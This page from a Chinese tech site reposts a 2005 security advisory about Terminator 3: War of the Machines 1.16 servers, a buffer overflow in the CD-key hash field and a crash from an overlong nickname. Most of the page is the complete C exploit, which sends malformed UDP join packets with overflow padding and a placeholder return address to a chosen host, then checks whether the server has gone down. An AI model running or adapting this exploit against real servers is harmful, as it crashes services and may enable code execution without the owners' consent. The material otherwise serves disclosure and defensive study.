首页 电脑 电脑学堂 查看内容

Terminator 3: War of The Machines Buffer Overflow and DoS

2005-5-30 12:48 562 0

摘要: Vulnerable Systems: * Terminator 3: War of the Machines version 1.16Buffer Overflow:The text fi...
关键词: nbsp aaaaaaaaaaaaaaaa include define server str len buff Overflow PORT

Vulnerable Systems: * Terminator 3: War of the Machines version 1.16Buffer Overflow:The text field containing the client CD-key hash is the cause of a buffer-overflow that affects the server and allow attackers to execute arbitrary code on the server.Note: this is NOT the Gamespy CD-key SDK buffer-overflow.Denial of Service:If an attacker uses a too long nickname the server crashes for the access to an arbitrary zone of the memory.Exploit:/* t3wmbof.c *//*by Luigi Auriemma - http://aluigi.altervista.org/poc/t3wmbof.zip*/#include <stdio.h>#include <stdlib.h>#include <string.h>#include <time.h>#include "rwbits.h"#ifdef WIN32    #include <winsock.h>    #include "winerr.h"    #define close closesocket    #define ONESEC 1000#else    #include <unistd.h>    #include <sys/socket.h>    #include <sys/types.h>    #include <arpa/inet.h>    #include <netinet/in.h>    #include <netdb.h>    #define ONESEC 1#endif#define VER "0.1"#define BUFFSZ 4096#define PORT 60005#define TIMEOUT 1#define TWAIT 3#define NICKSZ 16#define JOIN1 "try"#define ANSW "try_this " /* challenge and "server_token" */#define JOIN2 "connect " \                    "%d " /* version */ \                    "%d " /* challenge */ \                    "\"%s\" " /* Gamespy cd-key */ \                    "%s" /* nickname */#define EIP "\xde\xc0\xad\xde"#define BOF "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \ "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \                    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \ "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \                    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \ "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \                    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \ "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \                    EIP#define SEND(x,y) if(sendto(sd, x, y, 0, (struct sockaddr *)&peer, sizeof(peer)) \                      < 0) std_err();#define RECV(x,y) len = recvfrom(sd, x, y, 0, NULL, NULL); \                    if(len < 0) std_err();int read_bitstr(u_char *in, int inlen, u_char *out, int bits);int write_bitstr(u_char *in, u_char *out, int bits);int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz);u_int create_rand_string(u_char *data, int len, u_int num);int show_info(u_char *data, int len);int timeout(int sock);u_long resolv(char *host);void std_err(void);struct sockaddr_in peer;int main(int argc, char *argv[]) {    u_int seed;    int sd,            tmp,            len,            gamever,            chall,            attack;    u_short port = PORT;    u_char buff[BUFFSZ + 1],            str[BUFFSZ + 1],            nick[NICKSZ + 1],            info[] =                "\xfe\xfd" "\x00" "\x00\x00\x00\x00" "\xff\x00\x00",            *token,            *p;#ifdef WIN32    WSADATA wsadata;    WSAStartup(MAKEWORD(1,0), &wsadata);#endif    setbuf(stdout, NULL);    fputs("\n"        "Terminator 3 War of the Machines <= 1.16 buffer-overflow and crash "VER"\n"        "by Luigi Auriemma\n"        "e-mail: [email protected]\n"        "web: http://aluigi.altervista.org\n"        "\n", stdout);    if(argc < 3) {        printf("\n"            "Usage: %s <attack> <host> [port(%d)]\n"            "\n"            "Attack:\n"            " 1 = cd-key hash buffer-overflow, return address 0x%08lx\n"            " 2 = big nickname access violation\n"            "\n", argv[0], port, *(u_long *)EIP);        exit(1);    }    attack = atoi(argv[1]);    if(argc > 3) port = atoi(argv[3]);    peer.sin_addr.s_addr = resolv(argv[2]);    peer.sin_port = htons(port);    peer.sin_family = AF_INET;    printf("- target %s : %hu\n",        inet_ntoa(peer.sin_addr), port);    fputs("- request informations\n", stdout);    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);    if(sd < 0) std_err();    *(u_long *)(info + 3) = ~time(NULL);    len = send_recv(sd, info, sizeof(info) - 1, buff, BUFFSZ);    close(sd);    gamever = show_info(buff, len);    printf("\n- set game version %d\n", gamever);    seed = time(NULL);    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);    if(sd < 0) std_err();    *buff = 0x00;    tmp = write_bitstr(JOIN1, buff, 2);    len = tmp >> 3;    if(tmp & 7) len++;    printf("- send \"%s\" packet\n", JOIN1);    len = send_recv(sd, buff, len, buff, BUFFSZ);    read_bitstr(buff, len, str, 2);    if(strncmp(str, ANSW, sizeof(ANSW) - 1)) {        printf("\nError: wrong reply from the server:\n"            "\n %s\n\n", str);        exit(1);    }    p = str + (sizeof(ANSW) - 1);    chall = atoi(p);    token = strchr(p, '\"');    if(!token) {        printf("\nError: no server token in the server reply:\n"            "\n %s\n\n", str);        exit(1);    }    p = strchr(++token, '\"');    if(p) *p = 0x00;    if(attack == 1) { // buffer overflow        create_rand_string(nick, NICKSZ, seed);        len = sprintf(            str,            JOIN2,            gamever,            chall,            BOF,            nick);    } else { // access violation        len = sprintf(            str,            JOIN2,            gamever,            chall,            "000000000000000000000000000000" \ "000000000000000000000000000000000000000000",            BOF);    }    *buff = 0x00;    tmp = write_bitstr(str, buff, 2);    len = tmp >> 3;    if(tmp & 7) len++;    fputs("- send malformed join packet\n", stdout);    len = send_recv(sd, buff, len, buff, BUFFSZ);    close(sd);    read_bitstr(buff, len, str, 2);    if(strcmp(str, "connected")) {        printf("\nError: player not accepted for the following error:\n"            "\n %s\n\n", str);        exit(1);    }    close(sd);    sleep(ONESEC);    fputs("- check server:\n", stdout);    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);    if(sd < 0) std_err();    *(u_long *)(info + 3) = ~time(NULL);    SEND(info, sizeof(info) - 1);    if(timeout(sd) < 0) {        fputs("\nServer IS vulnerable!!!\n\n", stdout);    } else {        fputs("\nServer doesn't seem vulnerable\n\n", stdout);    }    close(sd);    return(0);}int read_bitstr(u_char *in, int inlen, u_char *out, int bits) {    while((*out = read_bits(8, in, bits)) && inlen--) {        bits += 8;        out++;    }    return(bits);}int write_bitstr(u_char *in, u_char *out, int bits) {    while(*in) {        bits = write_bits(*in, 8, out, bits);        in++;    }    bits = write_bits(0x00, 8, out, bits); // NULL    return(bits);}int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz) {    int i,            len;    for(i = 3; i; i--) {        SEND(in, insz);        if(!timeout(sd)) break;    }    if(!i) {        fputs("\nError: socket timeout, no reply received\n\n", stdout);        exit(1);    }    RECV(out, outsz);    return(len);}u_int create_rand_string(u_char *data, int len, u_int num) {    const static u_char table[] =        "0123456789"        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"        "abcdefghijklmnopqrstuvwxyz";    len = num % len;    if(len < 3) len = 3;    while(len--) {        num = (num * 0x343FD) + 0x269EC3;        *data++ = table[num % (sizeof(table) - 1)];    }    *data = 0x00;    return(num);}int show_info(u_char *data, int len) {    int nt = 0,            ver = -1,            d;    u_char *limit = data + len;    fputc('\n', stdout);    data += 5;    while(data < limit) {        d = strlen(data);        if(nt & 1) {            if(!ver) ver = atoi(data);            printf("%s\n", data);        } else {            if(!d) break;            if(!strcmp(data, "gamever")) ver = 0;            printf("%30s: ", data);        }        data += d + 1;        nt++;    }    return(ver);}int timeout(int sock) {    struct timeval tout;    fd_set fd_read;    int err;    tout.tv_sec = TIMEOUT;    tout.tv_usec = 0;    FD_ZERO(&fd_read);    FD_SET(sock, &fd_read);    err = select(sock + 1, &fd_read, NULL, NULL, &tout);    if(err < 0) std_err();    if(!err) return(-1);    return(0);}u_long resolv(char *host) {    struct hostent *hp;    u_long host_ip;    host_ip = inet_addr(host);    if(host_ip == INADDR_NONE) {        hp = gethostbyname(host);        if(!hp) {            printf("\nError: Unable to resolv hostname (%s)\n", host);            exit(1);        } else host_ip = *(u_long *)hp->h_addr;    }    return(host_ip);}#ifndef WIN32    void std_err(void) {        perror("\nError");        exit(1);    }#endif/* EOF */ 来源:www.securiteam.com
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部